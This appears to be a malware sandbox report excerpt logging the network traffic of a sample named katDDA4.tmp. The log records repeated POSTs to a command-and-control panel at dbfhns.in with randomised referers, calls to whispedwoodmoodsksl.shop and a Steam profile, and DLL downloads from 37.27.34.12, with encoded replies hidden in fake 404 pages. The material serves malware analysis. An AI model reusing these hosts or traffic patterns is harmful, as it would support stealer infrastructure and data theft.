                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmlmhdjgxcsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhyltqofxhpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxoumlltphj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etetxpvheghmlur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spdxbqopubx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxinixbdcjjccvdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euirtythbemo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btndjessgdxlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfymgppnbopwxnwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckgltynaavllsolq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbtkypdfbiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://haglmiwlgvefe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnvpkenpnlmca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvgxhyimdjdqth.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: dbfhns.in
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CCC60 PR_Recv,12_2_6D0CCC60
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:22 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:27 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:33 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:40 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:49 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:25:57 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:01 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:06 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:14 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:19 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:25 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:32 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:38 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:43 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:51 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:26:56 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 27 May 2024 13:27:01 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/m
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/mozglue.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/mozglue.dlleub
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dll/
